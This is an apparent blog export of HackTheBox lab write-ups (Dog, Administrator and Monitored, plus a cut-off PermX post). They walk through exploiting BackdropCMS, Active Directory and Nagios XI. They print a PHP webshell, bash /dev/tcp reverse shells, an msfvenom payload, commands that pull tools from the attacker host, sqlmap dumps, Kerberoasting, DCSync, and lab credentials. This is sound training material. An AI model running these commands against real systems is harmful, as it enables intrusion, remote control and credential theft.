[
  {
    "title":     "HackTheBox - Dog Writeup",
    "permalink": "/posts/dog/",
    "date":      "jan 07 2025",
    "summary":   "Credential exposure via an open Git repository leads to admin access on BackdropCMS, a web shell foothold, and ultimately root via a misconfigured sudo permission on bee.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "This machine is an easy rated Linux machine. This writeup will demonstrate how I was able to run commands in the context of the root user. This box involves reading sensitive data found in an exposed git repository leading to access to an admin user on BackdropCMS. With these privileges we are able to find an exploit that allows us to build a malicious module in the form of a web shell. This is used to gain an initial foothold with a reverse shell. Taking a list of users and reusing the password we have will allow logging in as the user johncusack. After accessing this account and observing the sudo permissions, it is seen that it can run a binary called bee with sudo permission. Using this tool with sudo access allows an attacker to run commands in the context of the root user.\nScanning I start by running rustscan to quickly get a list of the ports that are open on this machine:\n1rustscan -g -a 10.129.20.215 --ulimit 5000 From rustscan, we will see that the following ports are returned in a list, this format is given by using the -g flag with rustscan:\n122,80 The ports found by rustscan are passed to nmap using the -p flag:\n1nmap -p 22,80 -sC -sV -oA Nmap/rustports 10.129.20.215 The nmap scan returns the following output:\n1PORT STATE SERVICE VERSION 222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) 3| ssh-hostkey: 4| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA) 5| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA) 6|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519) 780/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 8| http-git: 9| 10.129.20.215:80/.git/ 10| Git repository found! 11| Repository description: Unnamed repository; edit this file \u0026#39;description\u0026#39; to name the... 12|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... 
13|_http-server-header: Apache/2.4.41 (Ubuntu) 14|_http-generator: Backdrop CMS 1 (https://backdropcms.org) 15|_http-title: Home | Dog 16| http-robots.txt: 22 disallowed entries (15 shown) 17| /core/ /profiles/ /README.md /web.config /admin 18| /comment/reply /filter/tips /node/add /search /user/register 19|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply 20Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Visiting the site about page we can see the domain dog.htb being used, this can be added to the /etc/hosts file.\n1echo -e \u0026#39;10.129.242.10\\tdog.htb\u0026#39; | sudo tee -a /etc/hosts Enumerating the Git Repository From the nmap output we can see that a git repository was found. We can navigate to this at http://dog.htb/.git/. We can use a tool called git-dumper to get the contents of this git repository.\n1git-dumper http://dog.htb/.git Git Inside the repo we can find a file called settings.php. Inside this file we can find a database connection string:\n1$database = \u0026#39;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop\u0026#39;; 2$database_prefix = \u0026#39;\u0026#39;; Doing a recursive search over the Git directory we have, we can find a username - tiffany@dog.htb.\nUsing the password we found in settings.php and this username, we are able to login to the admin interface of the website:\n1tiffany@dog.htb:BackDropJ2024DS2024 Exploiting Backdrop CMS Navigating to http://dog.htb/?q=admin/people/list we can see a list of the users of the site.\nThere is a \u0026ldquo;Reports\u0026rdquo; section in the admin menu bar. Clicking into here there is the option to view available updates for plugins/themes/etc. This is located at http://dog.htb/?q=admin/reports/updates. Looking in here we can see that the site is currently using version 1.27.1 of backdrop.\nI had a look for exploits against this version and got a hit on exploitDB. 
We can query this database in the terminal using searchsploit:\n1searchsploit backdrop 1.27.1 2searchsploit -m 52021.py Reviewing the Backdrop CMS Exploit Code In this script we can see that it is expecting us to pass in the URL as a sysarg:\n1if __name__ == \u0026#34;__main__\u0026#34;: 2 import sys 3 if len(sys.argv) \u0026lt; 2: 4 print(\u0026#34;Usage: python script.py [url]\u0026#34;) 5 else: 6 main(sys.argv[1]) In this script we see that it creates two files, shell.info and shell.php. For our purposes, we are more interested in what shell.php is doing. We can see that it is creating a webshell for us by creating a form, taking a cmd value, then passing that to system() to be executed. The below extract is from the create_files() function where this happens:\n1shell_content = \u0026#34;\u0026#34;\u0026#34; 2 \u0026lt;html\u0026gt; 3 \u0026lt;body\u0026gt; 4 \u0026lt;form method=\u0026#34;GET\u0026#34; name=\u0026#34;\u0026lt;?php echo basename($_SERVER[\u0026#39;PHP_SELF\u0026#39;]); ?\u0026gt;\u0026#34;\u0026gt; 5 \u0026lt;input type=\u0026#34;TEXT\u0026#34; name=\u0026#34;cmd\u0026#34; autofocus id=\u0026#34;cmd\u0026#34; size=\u0026#34;80\u0026#34;\u0026gt; 6 \u0026lt;input type=\u0026#34;SUBMIT\u0026#34; value=\u0026#34;Execute\u0026#34;\u0026gt; 7 \u0026lt;/form\u0026gt; 8 \u0026lt;pre\u0026gt; 9 \u0026lt;?php 10 if(isset($_GET[\u0026#39;cmd\u0026#39;])) 11 { 12 system($_GET[\u0026#39;cmd\u0026#39;]); 13 } 14 ?\u0026gt; 15 \u0026lt;/pre\u0026gt; 16 \u0026lt;/body\u0026gt; 17 \u0026lt;/html\u0026gt; 18 \u0026#34;\u0026#34;\u0026#34; 19 shell_php_path = \u0026#34;shell/shell.php\u0026#34; 20 with open(shell_php_path, \u0026#34;w\u0026#34;) as file: 21 file.write(shell_content) 22 return shell_info_path, shell_php_path We then see that these two files are bundled into a zip file to be uploaded as a module. 
This takes place in the create_zip() function:\n1def create_zip(info_path, php_path): 2 zip_filename = \u0026#34;shell.zip\u0026#34; 3 with zipfile.ZipFile(zip_filename, \u0026#39;w\u0026#39;) as zipf: 4 zipf.write(info_path, arcname=\u0026#39;shell/shell.info\u0026#39;) 5 zipf.write(php_path, arcname=\u0026#39;shell/shell.php\u0026#39;) 6 return zip_filename Uploading the Backdrop CMS Exploit Payload After running the script, we can see that it drops a malicious PHP webshell in a zip file that we will now need to upload.\n1python 52021.py http://10.129.231.223 I was trying to get this exploit to work using http://dog.htb but it would not work until I used the IP address of the machine instead.\nWe can now navigate to http://dog.htb/admin/modules/install as the exploit is telling us and upload the malicious zip through a manual install.\nI removed the shell.zip file and instead compressed the payload directory with tar:\n1tar -cvf shell.tar shell Now when we upload, we see a success message from http://dog.htb/core/authorize.php.\nGetting a Reverse Shell with the Web Shell Now we can check to see if the web shell is functioning by going to http://dog.htb/modules/shell/shell.php.\nIn my case, going to this link shows that it was successful and we can run commands.\nThis shell seems to be getting deleted so I prepared a reverse shell payload to launch against it.\n1bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.166/4444 0\u0026gt;\u0026amp;1\u0026#34; I then got a netcat listener running so that after executing this in the webshell I could catch a session.\n1nc -nvlp 4444 After executing the reverse shell payload we can check our listener and see that we have a session on the box.\nEnumerating the Machine as www-data Navigating to /home we can see there are two home directories. We can find user.txt in /home/johncusack, however, we do not have permission to read it.\nWe will need a working directory, /tmp looks like a good location. 
Looking in here we will see the files we were submitting for a new module. I am going to move linpeas on to the box to enumerate it. To do this I will locate it on my Kali machine, move it to my working directory, and start a Python HTTP server. I will then use curl on the victim machine to get it.\n1#KALI 2locate linpeas 3cp /usr/share/peass/linpeas/linpeas.sh . 4python3 -m http.server 80 5 6#VICTIM 7curl http://10.10.14.166/linpeas.sh -o /tmp/linpeas.sh We do not have execute permission against linpeas, so we will modify the permissions to allow us to do this.\n1chmod +x linpeas.sh Getting an SSH Session as johncusak After a quick check over the output and not seeing anything to use, I went back to the password found earlier and tested it against the users who had home directories. Doing this, I was able to get an SSH session as johncusack:BackDropJ2024DS2024.\nssh johncusack@dog.htb I was now out of the docker environment and was able to obtain the user flag for this box.\nSudo Permission on Bee Having a look at the sudo access of johncusack using sudo -l we can see that there is sudo access to usr/local/bin/bee.\nI started searching to see what this binary was and found out that it is a command line utility for Backdrop CMS - https://github.com/backdrop-contrib/bee\nLooking at the the help menu by running sudo /usr/local/bin/bee, we can see that there is the option to run PHP code using eval.\nTrying to run this command was failing showing that the required bootstrap level was not ready.\nI looked back to the top of the help menu and saw that there should be a root of the Backdrop install.\nCollecting the Root Flag I went back to the shell I had as www-data and saw that the shell landed in /var/www/html/modules/shell which can be seen in the earlier screenshot. This was making me think that /var/www/html was the root since the modules build off here. 
I moved to this directory and ran the same eval command and was able to obtain the root flag.\n1sudo /usr/local/bin/bee ev \u0026#34;system(\u0026#39;cat /root/root.txt\u0026#39;)\u0026#34; "
  },
  {
    "title":     "HackTheBox - Administrator Writeup",
    "permalink": "/posts/administrator/",
    "date":      "jan 05 2025",
    "summary":   "A WinRM foothold leads to a chain of AD abuse — GenericAll, ForceChangePassword, GenericWrite, Kerberoasting, and DCSync — culminating in Domain Admin after cracking a PSafe3 password manager file.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "This machine is a retired medium rated Windows box. We are given the credentials to a user account that will give us our initial foothold. After our initial scanning we can see the services that are running and we get an easy access point using the olivia account over WinRM. Following on from here, we will need to use SharpHound as a collector for Bloodhound and do some AD enumeration. This will become important as we will need to come back to refer to it several times. In this box we will see the abuse of GenericAll, ForceChangePassword, GenericWrite, Kerberoasting, and DCSync for our AD attack vectors. We will also see some cracking of a password manager file in a psafe3 format. This box required quite a few user pivots before getting to the domain administrator.\nScanning To get a quick overview of the open ports on the machine I ran rustscan.\n1rustscan -g -a 10.129.244.185 --ulimit 5000 With the addition of the -g flag we are able to get the ports in a comma seperated list.\n110.129.244.185 -\u0026gt; [21,53,88,135,139,389,445,464,593,3268,5985,9389,47001,49665,49664,49668,49666,49667,63818,63823,63828,63839,63850,63882] The ports found by rustscan are now passed into the nmap scan under the -p flag.\n1nmap -p 21,53,88,135,139,389,445,464,593,3268,5985,9389,47001,49665,49664,49668,49666,49667,63818,63823,63828,63839,63850,63882 -sC -sV -oA Nmap/rustports 10.129.244.185 The nmap scan results in the following output:\n1PORT STATE SERVICE VERSION 221/tcp open ftp Microsoft ftpd 3| ftp-syst: 4|_ SYST: Windows_NT 553/tcp open domain Simple DNS Plus 688/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-05 02:05:47Z) 7135/tcp open msrpc Microsoft Windows RPC 8139/tcp open netbios-ssn Microsoft Windows netbios-ssn 9389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 10445/tcp open microsoft-ds? 11464/tcp open kpasswd5? 
12593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 133268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 145985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 15|_http-server-header: Microsoft-HTTPAPI/2.0 16|_http-title: Not Found 179389/tcp open mc-nmf .NET Message Framing 1847001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 19|_http-server-header: Microsoft-HTTPAPI/2.0 20|_http-title: Not Found 2149664/tcp open msrpc Microsoft Windows RPC 2249665/tcp open msrpc Microsoft Windows RPC 2349666/tcp open msrpc Microsoft Windows RPC 2449667/tcp open msrpc Microsoft Windows RPC 2549668/tcp open msrpc Microsoft Windows RPC 2663818/tcp open msrpc Microsoft Windows RPC 2763823/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 2863828/tcp open msrpc Microsoft Windows RPC 2963839/tcp open msrpc Microsoft Windows RPC 3063850/tcp open msrpc Microsoft Windows RPC 3163882/tcp open msrpc Microsoft Windows RPC 32Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows 33 34Host script results: 35| smb2-security-mode: 36| 3:1:1: 37|_ Message signing enabled and required 38|_clock-skew: 7h00m00s 39| smb2-time: 40| date: 2025-05-05T02:06:43 41|_ start_date: N/A 42 43Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 44Nmap done: 1 IP address (1 host up) scanned in 69.30 seconds Since we can see that 5985 is open, we can test out the credentials provided to us.\nEvil-WinRM - Olivia - Initial Access We can attempt to use the open WinRM service to log in with the olivia user. 
We are able to do this using the tool evil-winrm.\n1evil-winrm -i 10.129.244.185 -u olivia -p ichliebedich Enumerating - WinPeas and SharpHound Now that we have a foothold on the machine, we can start to enumerate the machine with WinPeas to see if we can get anything from examining the host.\n1#KALI 2locate -i winpeas 3cp /usr/share/peass/winpeas/winPEASx64.exe . 4 5#VICTIM 6upload ./Payload/winPEASx64.exe During my enumeration, I was not finding anything useful. Since we know we are looking at a domain controller, AD could be the attack vector. We will need to move a collector on to the machine and get a zip file to upload into BloodHound. In my case I used SharpHound. To upload it to the machine I did the following:\n1#KALI 2locate -i sharphound 3cp /opt/BloodHound-Legacy/Collectors/SharpHound.ps1 . 4 5#VICTIM 6upload ./Payload/SharpHound.ps1 Now that it is on the machine, we need to import it into our session so that we can run the collector:\n1powershell -ep bypass 2. .\\SharpHound.ps1 3Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\\Users\\olivia\\Documents -OutputPrefix administrator Now that we have the zip file generated, we can move it back to our Kali host to analyse it.\n1download administrator_20250504195007_BloodHound.zip BloodHound Enumeration Now we will need to start neo4j and run BloodHound:\n1sudo neo4j start \u0026amp; 2sudo bloodhound \u0026amp; Now we can use the upload data button and import the zip file we generated for analysis. Once everything is loaded in, we can make a start.\nFirst I start by looking at the users we have using a cypher query:\n1MATCH(m:User) RETURN m We can right click olivia and mark this user as owned.\nClicking into olivia and examining the node info, we see under the Outbound Object Control section, in the First Degree Object control, that olivia has GenericAll privilege over michael.\nGaining Access to Michael Right clicking the GenericAll, we can open the help menu. 
Looking through this, we can see that we have the option to reset the password of the user.\n1net user michael Password123 /domain With this change of password, we can now connect to the machine as michael using evil-winrm.\n1evil-winrm -i 10.129.244.185 -u michael -p Password123 BloodHound Enumeration - Michael Going back to BloodHound we can check the First Degree Object Control michael has. We can see that he has ForceChangePassword privilege over the user benjamin.\nGaining Access to Benjamin I was trying to use the same net.exe method to change the password, but this was resulting in a \u0026ldquo;system error 5\u0026rdquo;. As an alternative, I started by moving PowerSploit into my Payloads directory.\n1cp /opt/PowerSploit/Recon/PowerView.ps1 ./Payloads I then uploaded this to the machine:\n1upload ./Payloads/PowerView.ps1 We can now set the execution policy to bypass and import the module.\n1powershell -ep bypass 2. .\\PowerView.ps1 Now we can set a new password for the user benjamin:\n1$SecPassword = ConvertTo-SecureString \u0026#39;Password123\u0026#39; -AsPlainText -Force 2$Cred = New-Object System.Management.Automation.PSCredential(\u0026#39;administrator.htb\\benjamin\u0026#39;, $SecPassword) 3$UserPassword = ConvertTo-SecureString \u0026#39;Password123\u0026#39; -AsPlainText -Force 4Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword Checking Access as Benjamin If we try to use evil-winrm with benjamin, we are not able to get a session, however, we can connect to SMB.\n1smbclient -U \u0026#39;administrator.htb/benjamin%Password123\u0026#39; -L //10.129.244.185 This does not result in anything, however, in the nmap output we can see that FTP is running. Attempting to connect to this as benjamin is successful. 
Looking at the contents in this directory, we see that there is a file called Backup.psafe3.\n1ftp benjamin@10.129.244.185 2get Backup.psafe3 We can use the file command to see what it is:\n1file Backup.psafe3 Password Safe V3 - How do I Exploit This? Looking up \u0026ldquo;password safe v3\u0026rdquo;, we come across a GitHub repository. Inside the Linux readme we can see that it is in the apt repo.\n1sudo apt install passwordsafe Looking up \u0026ldquo;psafe3 password cracking\u0026rdquo; we see that hashcat supports cracking this.\nWe can now run hashcat against the psafe3 file:\n1hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt We see this is successful and get the password for this file: tekieromucho\nLooking inside the password manager, we find credentials for alexander, emily, and emma.\nLooking through these, we can collect the following:\n1alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw 2emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 3emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur More BloodHound Enumeration - Password Manager Accounts I went back to BloodHound to see if any of these users had anything that could be useful to me. I could see that emily had GenericAll privileges over ethan.\nGaining Access to Emily - User Flag I tried the creds obtained for emily and was able to get a session through evil-winrm. We are also able to obtain the user flag at this point.\n1evil-winrm -i 10.129.244.185 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb Kerberoasting Ethan Now we need to get PowerView on the machine again.\n1upload ./Payloads/PowerView.ps1 2powershell -ep bypass 3. .\\PowerView.ps1 Looking at the help section in BloodHound, we see that we can perform a kerberoast attack. I was trying to follow the steps to do this from the Blazorized box, however, I was getting a .ctor error.\nThis is showing that the credentials being provided for the SPN are wrong. 
I went back over the instructions given in BloodHound and was able to get this working.\n1Set-DomainObject -Identity ethan -SET @{serviceprincipalname=\u0026#39;hack/pwn\u0026#39;} 2$SecPassword = ConvertTo-SecureString \u0026#39;UXLCI5iETUsIBoFVTj8yQFKoHjXmb\u0026#39; -AsPlainText -Force 3$Cred = New-Object System.Management.Automation.PSCredential(\u0026#39;Administrator.htb\\emily\u0026#39;, $SecPassword) 4Get-DomainSPNTicket -Credential $Cred hack/pwn | fl Cracking the Hash We need to clean up this hash so that it is valid:\n1$krb5tgs$23$*UNKNOWN$UNKNOWN$hack/pwn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put this into a file called hackpwn.hash. I then used hashcat to crack this.\n1hashcat -m 13100 hackpwn.hash /usr/share/wordlist/rockyou.txt We see in the output that this is successful and we get the password limpbizkit.\nEthan - DCSync Looking at Ethan in BloodHound, we can see that the account has DCSync on the domain.\nTrying to use evil-winrm to get on the machine and use mimikatz to do an lsadump failed. I used impacket-secretsdmp to get the administrator\u0026rsquo;s NTLM hash, the IP is different here due to a reset:\n1impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.236.72 Evil-WinRM - Domain Administrator NTLM Hash Now we can connect to the machine using evil-winrm as the administrator:\n1evil-winrm -i 10.129.236.72 -u administrator -H \u0026#39;3dc553ce4b9fd20bd016e098d2d2fd2e\u0026#39; "
  },
  {
    "title":     "HackTheBox - Monitored Writeup",
    "permalink": "/posts/monitored/",
    "date":      "jan 26 2024",
    "summary":   "SNMP leaks credentials to abuse the API, a CVE steals the admin API key, and built-in functionality delivers a reverse shell before a sudo misconfiguration leads to root.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "Monitored is a medium rated retired Linux machine on HackTheBox. In this walkthough I demonstrate how I was able to obtain root access to this machine. This box will require you to use SNMP to get credentials for a disabled account. You will then need to abuse the API to get an authentication token. Next, find the right CVE to steal the administrator\u0026rsquo;s API key. With this key you can start adding users with admin access. Built in functionality can be abused to get a reverse shell. With this reverse shell you can then escalate your privileges by abusing the sudo permissions provided to the user account.\nScanning and Enumeration To get a quick overview of the open ports on the machine I ran rustscan.\n1rustscan -g -a 10.129.255.211 --ulimit 5000 With the addition of the -g flag we are able to get the ports in a comma seperated list.\n110.129.255.211 -\u0026gt; [22,80,389,443,5667] The ports found by rustscan are now passed into the nmap scan under the -p flag.\n1nmap -p 22,80,389,443,5667 -sC -sV -oA Nmap/rustports 10.129.255.211 The nmap scan results in the following output:\n1PORT STATE SERVICE VERSION 222/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) 3| ssh-hostkey: 4| 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA) 5| 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA) 6|_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519) 780/tcp open http Apache httpd 2.4.56 8|_http-server-header: Apache/2.4.56 (Debian) 9|_http-title: Did not follow redirect to https://nagios.monitored.htb/ 10389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 11443/tcp open ssl/http Apache httpd 2.4.56 ((Debian)) 12|_ssl-date: TLS randomness does not represent time 13|_http-title: Nagios XI 14| tls-alpn: 15|_ http/1.1 16| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK 17| Not valid before: 2023-11-11T21:46:55 18|_Not valid after: 2297-08-25T21:46:55 
19|_http-server-header: Apache/2.4.56 (Debian) 205667/tcp open tcpwrapped 21Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel The most interesting services from this are port 80/443. This will be the first target for enumeration.\nPort 80/443 - Discovering Nagios XI We see in the output of the nmap scan that port 80 is being redirected to https://nagios.monitored.htb/. We will need to add this to our /etc/hosts file to resolve the IP address of the machine to the FQDN given.\n1echo -e \u0026#39;10.129.255.211\\tnagios.monitored.htb\u0026#39; | sudo tee -a /etc/hosts With this added we can now visit the page and see the landing page for Nagios XI.\nClicking the \u0026ldquo;Access Nagios XI\u0026rdquo; button takes us to a page that has a login prompt. Trying to use default credentials fails here.\nAt this point I did not have credentials and further enumeration of what was provided in the nmap scan was proving useless.\nScanning UDP and Further Enumeration I wondered if there was a UDP service running that I was missing. To check this I ran another nmap scan:\n1sudo nmap -sU 10.129.255.211 This scan returned a service that I had run into before; SNMP.\n1 2PORT STATE SERVICE 368/udp open|filtered dhcpc 4123/udp open ntp 5161/udp open snmp 6162/udp open|filtered snmptrap On previous boxes I had been able to get credentials from SNMP so I was feeling optimistic and put my focus here.\nPort 161 - SNMP - Walking to Credentials The Hacktricks Pentesting SNMP guide is helpful for understanding what is going on with SNMP. Firstly we are going to want to be able to get the information stored in the MIB so we will need to know the community string. 
We can find a valid community string using the tool onesixtyone.\n1onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 10.129.255.211 From the output of onesixtyone, we learn that public is a valid community string.\n110.129.255.211 [public] Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64 We can now use the tool snmpwalk to retrieve the information found in the MIB.\n1snmpwalk -c public -v1 -t 10 10.129.255.211 In the output we can find this important output that provides us with a username of svc and their password XjH7VCehowpR1xZB.\n1HOST-RESOURCES-MIB::hrSWRunParameters.1380 = STRING: \u0026#34;-u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB\u0026#34; The Return to Nagios XI - Is That an API? Now that we have credentials, we might be able to SSH or login. Trying both of these will lead to failure. We see in an error message on Nagios XI that the account has been disabled or no longer exists.\nWhile using Feroxbuster to do some bruteforcing I came across something in the output that stood out as potentially interesting.\n1feroxbuster --url https://nagios.monitored.htb/nagiosxi/ -k --depth 2 In this output we see that there is a reference to /nagiosxi/api. We can continue to investigate this API and see what actions are available to us.\n1feroxbuster --url https://nagios.monitored.htb/nagiosxi/api -k --depth 2 We see that we get a 200 OK response on /nagiosxi/api/v1/authenticate.\nWith BurpSuite running and intercepting our traffic we can go and visit:\n1https://nagios.monitored.htb/nagiosxi/api/v1/authenticate. It will now appear in the HTTP history for us to have a look at it.\nWe see that it is expecting a POST request which was expected since it is handling authentication. We can right click the request and send it to Repeater. In the repeater tab we will want to right click the request and select the \u0026ldquo;Change request method\u0026rdquo; option. 
This will give use a valid POST request. Sending the request without any further data we will get the following response.\n1\u0026#34;error\u0026#34;:\u0026#34;Must be valid username and password.\u0026#34; We can guess that we need to send a username and password parameter pair. Checking the support posts we can see one that confirms this is the case.\nNow we can append the svc account credentials to this post request and see if we can get authenticated.\nIn the response we see that we are now given an auth token! Now we just need to figure out what we can do with it.\nIn the Nagios XI API documentation we can see the an auth token being used.\nI took a while trying out different things and looking for something that might let me login. It took a while but I finally wondered if the login page might allow me to give the token as a paramter\u0026hellip;\n1https://nagios.monitored.htb/nagiosxi/login.php?token=f400ecaf0b959b7d4eeb956fd5f0e57a20bc9f65 After submitting the auth token I now had access to the Nagios XI dashboard as the user svc.\nGot Access to Nagios XI - Next Steps Now we can start having a look around the application to see if there is anything we can exploit now that we are an authenticated user. In the bottom left we can see the version of the software identified as Nagios XI 5.11.0.\nLooking for exploits for this version we can see that there is a SQL injection vulnerability CVE-2023-40931.\nIn the provided PoC we can see that they are targetting the same HackTheBox machine so all we need to do is change the session cookie to our one which can be found in the browser.\n1sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=j5sjd8o9v911c9cin99713ko43\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump We can accept all of the default values provided. 
We will see that we are able get a dump of the xi_users table from the nagiosxi database:\nIt is very hard to read the table in the terminal so we can open the csv file generated in LibreOffice Calc for an easier time:\n1/home/\u0026lt;user\u0026gt;/.local/share/sqlmap/output/nagios.monitored.htb/dump/nagiosxi/xi_users.csv In this file we can see that there are usernames and password hashes.\nTrying to crack these hashes fails so we will take the API keys instead and see what we can do with these.\nUsing the API to Add Admin Users in Nagios XI Looking at the Nagios forum we can see how to add a user using an API key. We will use the admin user\u0026rsquo;s API key to do this:\n1curl -XPOST \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=hacker\u0026amp;password=hack\u0026amp;name=Hacker%20Pwned\u0026amp;email=hacker@localhost\u0026#34; After executing this command we see that our user has been added:\nThe forum post linked to above mentioned API documentation. The API documentation I could find was pretty poor so I instead opted to go back to Google to try and find the answer I was looking for.\nSearching for nagios xi \u0026quot;api/v1/system/user\u0026quot; we find a forum post discussing creating an account with the auth_level being set in the POST request. In this case, I tried to add an admin user.\n1curl -XPOST \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=pwned\u0026amp;password=hack\u0026amp;name=Hacker%20Pwned\u0026amp;email=hacker@localhost\u0026amp;auth_level=admin\u0026#34; -k We see that this request is successful. 
We should now have access to an admin user.\nLogging in to the admin user we created and looking at the buttons in the menu we see a nice admin option is available now.\nGetting a Reverse Shell Under the configure option from the navigation menu, we see that we can access the \u0026ldquo;Core Config Manager\u0026rdquo; which has commands stored in it.\nLooking at the list of commands currently in use, we can see one that makes a call to /usr/bin/php maybe we can add one that will create a reverse shell for us.\nWe will add a new command with the following payload:\n1bash -c \u0026#39;/bin/bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.16.31/4443 0\u0026gt;\u0026amp;1\u0026#39; We see that we need to apply the new config so we can use it.\nWe are taken to the following page to apply the config:\nWe will get a message confirming that this was added if it was successful:\nComing back to Configure \u0026gt; Core Config Manager we can find a Services button. In here we find some active service configs.\nI chose the SSH service listed and changed the Check command option to my reverse shell payload while having a netcat listener running on port 4443:\nAfter clicking the Run Check Command button in the pop up interface, we see that a reverse shell comes back as the user nagios.\nWe are now able to obtain the user flag:\nPrivilege Escalation To start the priv esc enumeration I moved linpeas on to the machine:\n1#KALI 2cd /usr/share/peass/linpeas 3python3 -m http.server 80 4 5#VICTIM 6wget http://10.10.16.31/linpeas.sh Now we will make linpeas executable and run it:\n1chmod +x linpeas.sh 2./linpeas.sh Linpeas Finds Interesting Scripts The output shows a writeable executables are being called by nagios.service and npcd.service.\nWe also see there are scripts available that we can run with sudo permission.\nLooking at the manage_services.sh script we can see that we have the ability to alter the state of services. 
We will create a malicious nagios binary and see if we can get it to run.\nFirst we check what the file format of the existing binary is, so we know what we need to generate with msfvenom.\nWe will now generate a payload to use as the nagios binary:\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.31 LPORT=443 -f elf \u0026gt; nagios\nWe will now host this on a Python HTTP server and transfer it over. A copy of the original binary is moved to the nagios home directory so it can be restored afterwards, and wget is used to put our malicious payload in its place.\nCurrently the file is not executable, so we fix this with chmod +x nagios:\nNow we will want to start a netcat listener on port 443 and restart the service so that root executes our binary:\n#KALI\nnc -nvlp 443\n\n#VICTIM\nsudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagios\nWe will see the following output when running the script:\nChecking our netcat listener, we will see a reverse shell come in as the root user and we can collect the root flag.\n"
  },
  {
    "title":     "HackTheBox - PermX Writeup",
    "permalink": "/posts/permx/",
    "date":      "jan 08 2024",
    "summary":   "CVE-2023-4226 delivers a reverse shell on a Chamilo LMS instance, credentials in a config file grant SSH access as mtz, and a symlink to /etc/sudoers abused via a sudoable setfacl script leads to root.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "PermX is an easy rated Linux machine from week 12 of HackTheBox season 5 \u0026ldquo;Anomalies\u0026rdquo;. In this walkthrough, I will demonstrate how I was able to obtain root access to this machine. This box was a standard easy rated box with a privilege escalation vector that required a bit of thinking. Subdomain enumeration uncovers a Chamilo LMS instance vulnerable to CVE-2023-4226, allowing unauthenticated file upload and a reverse shell as www-data. Linpeas reveals credentials in a Chamilo config file, granting SSH access as mtz. A sudoable script using setfacl is abused via a symbolic link to /etc/sudoers, granting mtz unrestricted sudo and root access.\nScanning and Enumeration First rustscan is run to quickly get a list of open ports. The -g flag is used in this case so that the output is provided as a list that can be easily passed to nmap.\nrustscan -g -a 10.129.255.122 --ulimit 5000\n[22,80]\nWe can then take these ports and pass them to an nmap scan.\nnmap -p 22,80 -sC -sV -oA Nmap/rustports 10.129.255.122\nPORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)\n|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)\n80/tcp open  http    Apache httpd 2.4.52\n|_http-server-header: Apache/2.4.52 (Ubuntu)\n|_http-title: Did not follow 